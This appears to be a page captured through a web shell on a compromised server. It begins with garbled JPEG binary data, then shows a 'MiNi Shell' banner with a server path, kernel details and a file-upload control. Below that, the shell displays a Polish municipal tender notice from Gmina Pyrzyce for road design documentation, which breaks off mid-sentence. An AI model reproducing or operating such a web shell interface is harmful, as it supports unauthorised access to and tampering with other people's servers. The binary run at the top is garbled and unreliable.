JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220909/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220909/0034074401-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie dokumentacji projektowo-kosztorysowej dla dróg na terenie Gminy Pyrzyce </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Pyrzyce</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 811685711</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Ratuszowy 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Pyrzyce</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">74-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL427 - Szczecinecko-pyrzycki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">091/39 70 310</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">091/39 70 314</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@pyrzyce.um.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pyrzyce.um.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie dokumentacji projektowo-kosztorysowej dla dróg na terenie Gminy Pyrzyce </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8b68d85f-300f-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00340744</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-09-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00003135/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.9 Opracowanie dokumentacji projektowo-kosztorysowej dla dróg na terenie Gminy Pyrzyce: Rozbudowa i przebudowa ul. Rycerza Przybora, ul. Żwirki i Wigury. Przebudowa drogi w m. Ryszewo.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/um_pyrzyce/proceedings <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/um_pyrzyce/proceedings</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja między Zamawiającym a<br/>Wykonawcami, w szczególności składanie zapytań, oświadczeń, wniosków, zawiadomień, jak również przekazywanie informacji<br/>odbywa się przy użyciu Platformy Zakupowej, dostępnej pod adresem https://platformazakupowa.pl/pn/smigiel.2. Wymagania<br/>techniczne i organizacyjne sporządzania, wysyłania i odbierania korespondencji elektronicznej opisane<br/>zostały w:1) „Regulaminie Internetowej Platformy zakupowej platformazakupowa.pl Open Nexus Sp. z<br/>o. o.” dostępnym pod adresem https://platformazakupowa.pl/strona/1-regulamin oraz 2) „Instrukcji dla<br/>wykonawców” dostępnej pod adresem https://platformazakupowa.pl/strona/45-instrukcje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z dnia 4 maja 2016 r., str. 1), dalej „RODO”, informuję, że:<br/>1) administratorem Pani/Pana danych osobowych jest Urząd Miejski w Pyrzycach, Plac Ratuszowy 1, 74-200 Pyrzyce;<br/>2) Inspektor ochrony danych urzęduje w Urzędzie Miejskim w Pyrzycach , Plac Ratuszowy 1, 74-200 Pyrzyce, tel. 91 39 70 317, e-mail: iod@pyrzyce.um.gov.pl w godzinach w poniedziałki 800-1600, w pozostałe dni tygodnia w godzinach 700-1500;<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego na „Opracowanie dokumentacji projektowo-kosztorysowej dla dróg na terenie Gminy Pyrzyce”<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 Ustawy,<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 Ustawy, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach Ustawy, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z Ustawy;<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO;<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IiID.271.16.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ZADANIE NR 1. <br/><br/> Rozbudowa i przebudowa ul. Rycerza Przybora w M. Pyrzyce (dz.nr 40 i 39/14 ,dz. nr 27, 30, 55 obr. 4 m.) wraz z infrastrukturą drogową: I etap - Opracowanie dokumentacji projektowo-kosztorysowej.<br/><br/>Przedmiotem zamówienia jest opracowanie kompletnej dokumentacji projektowo – kosztorysowej niezbędnej do uzyskania wymaganych prawem pozwoleń/zgłoszeń oraz sprawowanie nadzoru autorskiego w trakcie trwania robót budowlanych. Zakładane długości drogi: dz. nr 27 – długość ok. 300 mb, dz. nr 55 – długość ok 155 mb, dz. nr 30 – długość ok.700 mb, dz. nr 40 i 39/14 – długość ok 300 mb.<br/>1)	W zakres opracowania wchodzi:<br/>a)	Mapa do celów projektowych wraz mapami podziału <br/>b) Projekt budowlany wielobranżowy branż: drogowej, sanitarnej, elektrycznej wraz z rozwiązaniem wszelkich kolizji z infrastrukturą techniczną – po 6 egz.<br/>c) Projekt wykonawczy wielobranżowy branż: drogowej, sanitarnej, elektrycznej wraz z rozwiązaniem wszelkich kolizji z infrastrukturą techniczną – po 6 egz.<br/>d) Projekt budowy kanału technologicznego (w przypadku konieczności) – po 6 egz.<br/>e) Projekt budowy oświetlenia ulicznego na powietrznego oraz kablowego na oprawach ledowych – po 6 egz.<br/>f) uzyskanie warunków przyłączenia do sieci elektroenergetycznej ( w miarę potrzeb);<br/>g) wykonanie dokumentacji wraz kosztorysem inwestorskim usunięcia kolizji projektowanego<br/>oświetlenia z infrastrukturą uzbrojenia terenu w przypadku ich wystąpienia, zgodnie z<br/>obowiązującymi przepisami – po 6 egz.<br/>h) Projekt zagospodarowania zieleni wraz z wycinką drzew (wraz z uzyskaniem decyzji w przypadku konieczności) – po 6 egz.<br/>i) Projekt nasadzeń (w przypadku konieczności) – po 6 egz.<br/>j) Projekt stałej organizacji ruchu – 6 egz.<br/>k) Przedmiar robót – 2 egz. dla każdej z branż<br/>l) Kosztorys inwestorski – 2 egz. dla każdej z branż<br/>ł) Kosztorys ofertowy – 2 egz. dla każdej z branż<br/>m) Szczegółowe specyfikacje techniczne wykonania i odbioru robót budowlanych – 2 egz. dla każdej z branż<br/>n) Badania geologiczne gruntu – 2 egz.<br/>o) Pomiary natężenia ruchu – 2 egz.<br/>p) warunki techniczne, wymagane opinie, uzgodnienia właściwych organów, pozwolenia wodno-prawne, i inne niezbędne do uzyskania ostatecznej decyzji administracyjnej, uprawniającej Zamawiającego do rozpoczęcia robót budowlanych,<br/>2) Do Wykonawcy należy:<br/>a)	Uzyskanie wypisu i wyrysu z miejscowego planu zagospodarowania przestrzennego a jeżeli plan nie został uchwalony to uzyskanie decyzji o lokalizacji inwestycji celu publicznego – jeśli będę wymagane.<br/>b)	Uzyskanie niezbędnych badań gruntowych i sporządzenie dokumentacji geotechnicznej – jeśli wystąpi taka konieczność.<br/>c)	uzyskaniem decyzji o zezwoleniu na realizację inwestycji drogowej (ZRID) dla inwestycji – jeśli wystąpi taka konieczność<br/>d)	Uzyskanie innych wymaganych przepisami zgód, opinii, decyzji, pozwoleń, itp. <br/>e)	Pozyskanie mapy do celów projektowych dla całego zamierzenia inwestycyjnego; <br/>f)	uzyskanie w imieniu Zamawiającego wszelkich warunków niezbędnych w procesie projektowania;<br/>g)	sporządzenie projektów budowlanych i uzyskanie dla nich wynikających z przepisów: opinii, zgód, uzgodnień i pozwoleń łącznie z pozwoleniem na budowę lub zgłoszenie robót nie wymagające pozwolenia na budowę, <br/>h)	sporządzenie projektów wykonawczych branżowych i specyfikacji technicznych wykonania i odbioru robót dla wszystkich występujących branż, <br/>i)	sporządzenie kosztorysów inwestorskich i przedmiarów robót sporządzonych zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określania metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. z 2004r. nr 130 poz. 1389). <br/>j)	Wykonawca zobowiązany jest do przedstawiania i uzgadniania z Zamawiającym proponowanych rozwiązań projektowych. Projekt powinien zostać zaakceptowany i odebrany przez Zamawiającego. <br/>k) Dokumentację projektową należy wykonać zgodnie z obowiązującymi przepisami, normami, ze sztuką budowlaną oraz winna ona być opatrzona klauzulą o kompletności i przydatności z punktu widzenia celu, któremu ma służyć. Informacje zawarte w dokumentacji projektowej w zakresie technologii wykonania robót, doboru materiałów i urządzeń należy określić w sposób zgodny z przepisami ustawy Prawo zamówień publicznych. <br/>l)	Zaleca się przeprowadzenie wizji lokalnej w terenie, gdzie mają być wykonywane roboty. Wizję lokalną Wykonawca dokonuje na swój koszt. <br/>m)	Wykonawca w ramach niniejszego zamówienia poniesie wszelkie koszty niezbędne do wykonania dokumentacji projektowej i uzyskania niezbędnych pozwoleń ( Enea; Starostwo Powiatowe) . </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-20</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.Cena - najniższa cena brutto - 60 pkt. 2. Doświadczenie osób wyznaczonych do realizacji<br/>zamówienia ( doświadczenie projektanta w specjalności drogowej) – 40 pkt.<br/>Liczba zrealizowanych projektów dotyczących przedsięwzięć związanych z budową lub przebudową lub remontem drogi/dróg:<br/>• 1 projekt – 0 pkt.<br/>• 2 projekty – 20 pkt.<br/>• 3 i więcej projektów – 40 pkt.<br/>Informację należy wskazać w załączniku 1a do SWZ podając imię i nazwisko projektanta, nazwę, datę zakończenia inwestycji oraz<br/>podmiot na rzecz, którego inwestycja została zrealizowana.<br/>Niezłożenie wskazanego załącznika, bądź niewskazanie którejkolwiek z wymaganych wyżej informacji będzie skutkowało<br/>nieprzyznaniem punktów w niniejszym kryterium oceny ofert .</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ZADANIE NR 2<br/><br/>Rozbudowa i przebudowa ul. Żwirki i Wigury (dz.nr 19, dz.nr 41, dz. nr 30, obr. 5 m. Pyrzyce) wraz z infrastrukturą drogową: I etap - Opracowanie dokumentacji projektowo-kosztorysowej.<br/><br/>Przedmiotem zamówienia jest opracowanie kompletnej dokumentacji projektowo – kosztorysowej niezbędnej do uzyskania wymaganych prawem pozwoleń/zgłoszeń oraz sprawowanie nadzoru autorskiego w trakcie trwania robót budowlanych. Zakładane długości drogi: dz. nr 19 - długość ok. 700 mb, dz. nr 41 – długość ok 370 mb, dz. nr 30 – długość ok 480 mb.<br/>1) W zakres opracowania wchodzi:<br/>a)	Mapa do celów projektowych wraz mapami podziału <br/>b) Projekt budowlany wielobranżowy branż: drogowej, sanitarnej, elektrycznej wraz z rozwiązaniem wszelkich kolizji z infrastrukturą techniczną – po 6 egz.<br/>c) Projekt wykonawczy wielobranżowy branż: drogowej, sanitarnej, elektrycznej wraz z rozwiązaniem wszelkich kolizji z infrastrukturą techniczną – po 6 egz.<br/>d) Projekt budowy kanału technologicznego (w przypadku konieczności) – po 6 egz.<br/>e) Projekt budowy oświetlenia ulicznego na powietrznego oraz kablowego na oprawach ledowych – po 6 egz.<br/>f) uzyskanie warunków przyłączenia do sieci elektroenergetycznej ( w miarę potrzeb);<br/>g) wykonanie dokumentacji wraz kosztorysem inwestorskim usunięcia kolizji projektowanego<br/>oświetlenia z infrastrukturą uzbrojenia terenu w przypadku ich wystąpienia, zgodnie z<br/>obowiązującymi przepisami – po 6 egz.<br/>h) Projekt zagospodarowania zieleni wraz z wycinką drzew (wraz z uzyskaniem decyzji w przypadku konieczności) – po 6 egz.<br/>i) Projekt nasadzeń (w przypadku konieczności) – po 6 egz.<br/>j) Projekt stałej organizacji ruchu – 6 egz.<br/>k) Przedmiar robót – 2 egz. dla każdej z branż<br/>l) Kosztorys inwestorski – 2 egz. dla każdej z branż<br/>ł) Kosztorys ofertowy – 2 egz. dla każdej z branż<br/>m) Szczegółowe specyfikacje techniczne wykonania i odbioru robót budowlanych – 2 egz. dla każdej z branż<br/>n) Badania geologiczne gruntu – 2 egz.<br/>o) Pomiary natężenia ruchu – 2 egz.<br/>p) warunki techniczne, wymagane opinie, uzgodnienia właściwych organów, pozwolenia wodno-prawne, i inne niezbędne do uzyskania ostatecznej decyzji administracyjnej, uprawniającej Zamawiającego do rozpoczęcia robót budowlanych,<br/><br/>2) Do Wykonawcy należy:<br/>a)	Uzyskanie wypisu i wyrysu z miejscowego planu zagospodarowania przestrzennego a jeżeli plan nie został uchwalony to uzyskanie decyzji o lokalizacji inwestycji celu publicznego – jeśli będę wymagane.<br/>b)	Uzyskanie niezbędnych badań gruntowych i sporządzenie dokumentacji geotechnicznej – jeśli wystąpi taka konieczność.<br/>c)	uzyskaniem decyzji o zezwoleniu na realizację inwestycji drogowej (ZRID) dla inwestycji – jeśli wystąpi taka konieczność<br/>d)	Uzyskanie innych wymaganych przepisami zgód, opinii, decyzji, pozwoleń, itp. <br/>e)	Pozyskanie mapy do celów projektowych dla całego zamierzenia inwestycyjnego; <br/>f)	uzyskanie w imieniu Zamawiającego wszelkich warunków niezbędnych w procesie projektowania;<br/>g)	sporządzenie projektów budowlanych i uzyskanie dla nich wynikających z przepisów: opinii, zgód, uzgodnień i pozwoleń łącznie z pozwoleniem na budowę lub zgłoszenie robót nie wymagające pozwolenia na budowę, <br/>h)	sporządzenie projektów wykonawczych branżowych i specyfikacji technicznych wykonania i odbioru robót dla wszystkich występujących branż, <br/>i)	sporządzenie kosztorysów inwestorskich i przedmiarów robót sporządzonych zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określania metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. z 2004r. nr 130 poz. 1389). <br/>j)	Wykonawca zobowiązany jest do przedstawiania i uzgadniania z Zamawiającym proponowanych rozwiązań projektowych. Projekt powinien zostać zaakceptowany i odebrany przez Zamawiającego. <br/>k) Dokumentację projektową należy wykonać zgodnie z obowiązującymi przepisami, normami, ze sztuką budowlaną oraz winna ona być opatrzona klauzulą o kompletności i przydatności z punktu widzenia celu, któremu ma służyć. Informacje zawarte w dokumentacji projektowej w zakresie technologii wykonania robót, doboru materiałów i urządzeń należy określić w sposób zgodny z przepisami ustawy Prawo zamówień publicznych. <br/>l)	Zaleca się przeprowadzenie wizji lokalnej w terenie, gdzie mają być wykonywane roboty. Wizję lokalną Wykonawca dokonuje na swój koszt. <br/>m)	Wykonawca w ramach niniejszego zamówienia poniesie wszelkie koszty niezbędne do wykonania dokumentacji projektowej i uzyskania niezbędnych pozwoleń ( Enea; Starostwo Powiatowe) . </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-20</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień 